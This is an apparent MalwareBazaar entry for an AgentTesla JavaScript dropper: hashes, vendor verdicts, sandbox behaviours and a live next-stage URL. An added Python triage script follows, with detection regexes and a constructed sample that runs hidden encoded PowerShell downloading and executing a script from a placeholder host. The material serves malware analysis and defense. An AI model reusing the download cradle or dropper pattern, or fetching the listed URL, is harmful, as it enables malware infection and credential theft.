MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

AgentTesla

Vendor detections: 11



SHA256 hash: 5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c
SHA3-384 hash: 745c734843600c8b2e8b7adc92e8d3878fabdd31c24b14ebdc05df808e56dd1d06b41e457e398031652b8f6e93fdcdba
SHA1 hash: 338ce8d9974422d93bc5f99388cf69f7ff486d19
MD5 hash: a4b72990aed4489533cca2b488886417
humanhash: lemon-rugby-oxygen-nuts
File name: 5bc7a6540ac5984e13ac22b807a4724986bb179f9bcf81cab987cfab8e155d3c.js
Signature AgentTesla
File size: 5'208'673 bytes
First seen: 2025-09-10 12:55:58 UTC
Last seen: Never
File type: JavaScript (JS) js
MIME type: text/plain
ssdeep: 12288:caGW9ZEqk/gyQ8IJBhG/T/YceMlb+TpGyiFlF94NxU+6uR:caVzOAbhG/b3lb+TpGFlF94NxU+zR
Threatray: 3'908 similar samples on MalwareBazaar
TLSH: T17A369140FE0666C4CB175D7E3E207FAD1CE5E2BB63E7B71C36216CD2AA24844A1E2D15
Magika: javascript
Reporter: JAMESWT_WT
Tags: AgentTesla info-abdh-gmbh-de js LOSTINSPACE

Intelligence


File Origin
# of uploads: 1
# of downloads: 128
Origin country: IT
Vendor Threat Intelligence

Verdict: Malicious
Score: 94.9%
Tags: obfuscate xtreme spawn lien

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: anti-vm base64 obfuscated overlay powershell

Verdict: Malicious
File Type: js
First seen: 2025-09-10T04:56:00Z UTC
Last seen: 2025-09-10T04:56:00Z UTC
Hits: ~1000
Detections: PDM:Trojan.Win32.Generic, Trojan.JS.SAgent.sb, HEUR:Trojan-Downloader.Script.Generic, HEUR:Trojan.Script.Generic
Threat name: Win32.Trojan.Generic
Status: Suspicious
First seen: 2025-09-10 07:56:46 UTC
File Type: Binary
AV detection: 5 of 38 (13.16%)
Threat level: 5/5

Result
Malware family: agenttesla
Score: 10/10
Tags: family:agenttesla discovery execution keylogger spyware stealer trojan
Behaviour:
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- Command and Scripting Interpreter: JavaScript
- Enumerates physical storage devices
- System Location Discovery: System Language Discovery
- Suspicious use of SetThreadContext
- Looks up external IP address via web service
- Checks computer location settings
- Badlisted process makes network request
- Command and Scripting Interpreter: PowerShell
- AgentTesla
- Agenttesla family
Malware Config
Dropper Extraction: https://heuang.unaux.com/docx/file2.jpg
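The sandbox report above describes a JScript dropper that launches PowerShell, carries base64-obfuscated content, checks for a VM, looks up its external IP, and pulls its next stage from a URL that ends in .jpg. The following static triage script is an added example, not MalwareBazaar's code and not the listed sample; it shows how a responder can pre-screen a .js attachment for exactly those behaviours before detonating it. The indicator set, the regexes, the weights and the verdict thresholds are assumptions made for this example, the IP-lookup service names are illustrative, and SAMPLE_JS is a constructed snippet, not the real dropper. Two details worth noting: PowerShell's -EncodedCommand argument is base64 of UTF-16LE text (decoding it as UTF-8 yields NUL-interleaved junk), and a download primitive fed a URL with an image extension is flagged as a disguised payload, the pattern the Dropper Extraction entry shows.

```python
"""Static triage heuristics for a JScript (.js) dropper of the kind the
sandbox report describes. Added example; not MalwareBazaar's code and not
the listed sample. Indicators, weights and thresholds are assumptions."""
import base64
import hashlib
import re

# Regexes for the behaviours the report lists (PowerShell launch, base64
# obfuscation, external-IP lookup, anti-VM). Weights are illustrative.
INDICATORS = {
    "wscript_shell": (re.compile(r"ActiveXObject\(\s*['\"]WScript\.Shell['\"]", re.I), 2),
    "powershell": (re.compile(r"\bpowershell(?:\.exe)?\b", re.I), 3),
    # PowerShell accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc, ...)
    "ps_encoded": (re.compile(r"\s-(?:enc|encodedcommand|ec)\b", re.I), 2),
    "ps_hidden": (re.compile(r"\s-(?:w|windowstyle)\s+hidden\b", re.I), 1),
    "base64_blob": (re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"), 2),
    "ext_ip_lookup": (re.compile(r"api\.ipify\.org|checkip\.dyndns\.org|ip-api\.com", re.I), 2),
    "anti_vm": (re.compile(r"vmware|virtualbox|vbox|qemu|hyper-?v", re.I), 1),
}
ENC_CMD = re.compile(r"-(?:enc|encodedcommand|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)
DOWNLOADER = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|XMLHTTP|WinHttpRequest", re.I)
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif|bmp)$", re.I)


def find_indicators(text):
    """Count regex hits per indicator; indicators with no hits are omitted."""
    hits = {}
    for name, (rx, _weight) in INDICATORS.items():
        count = len(rx.findall(text))
        if count:
            hits[name] = count
    return hits


def decode_encoded_commands(script):
    """Decode -EncodedCommand blobs. PowerShell expects base64 of UTF-16LE text."""
    decoded = []
    for blob in ENC_CMD.findall(script):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # malformed blob: leave it for manual review
    return decoded


def find_urls(text):
    """Return URLs; an image-extension URL in a script that also holds a
    download primitive is flagged as a disguised payload location."""
    has_downloader = bool(DOWNLOADER.search(text))
    return [{"url": u, "disguised": has_downloader and bool(IMAGE_EXT.search(u))}
            for u in URL.findall(text)]


def triage(script):
    """Score the script together with any PowerShell it launches encoded."""
    decoded = decode_encoded_commands(script)
    text = script + "\n" + "\n".join(decoded)
    hits = find_indicators(text)
    # cap each indicator at 3 hits so one repeated string cannot dominate
    score = sum(INDICATORS[name][1] * min(count, 3) for name, count in hits.items())
    urls = find_urls(text)
    if any(u["disguised"] for u in urls):
        score += 3
    verdict = "malicious" if score >= 8 else "suspicious" if score >= 4 else "clean"
    return {"verdict": verdict, "score": score, "indicators": hits,
            "decoded_powershell": decoded, "urls": urls}


def hashes(data):
    """MD5/SHA1/SHA256 of the raw file, the hashes MalwareBazaar lists per entry."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


# Constructed sample (not the real dropper): WScript.Shell launcher, a bloat
# string, an external-IP service, a VM check and a hidden encoded PowerShell
# that downloads a script served under a .jpg name (example.invalid is a placeholder).
ENCODED_PS = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/docx/file2.jpg')"
    .encode("utf-16-le")).decode("ascii")
SAMPLE_JS = (
    'var sh = new ActiveXObject("WScript.Shell");\n'
    'var pad = "' + "A" * 300 + '";\n'
    'var ipsvc = "http://api.ipify.org";\n'
    'if (/vmware|virtualbox/i.test(sh.ExpandEnvironmentStrings("%PROCESSOR_IDENTIFIER%"))) WScript.Quit();\n'
    'sh.Run("powershell -w hidden -enc ' + ENCODED_PS + '", 0, false);\n'
)
BENIGN_JS = 'document.getElementById("greeting").innerText = "hello";\n'

if __name__ == "__main__":
    for label, js in (("sample", SAMPLE_JS), ("benign", BENIGN_JS)):
        r = triage(js)
        print(label, r["verdict"], r["score"], r["indicators"],
              [u["url"] for u in r["urls"] if u["disguised"]])
```

Run it on a quarantined .js by reading the file as text and passing it to triage(); compare hashes() of the raw bytes against the MD5/SHA1/SHA256 listed in the entry to confirm you are looking at the same sample before spending sandbox time on it.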
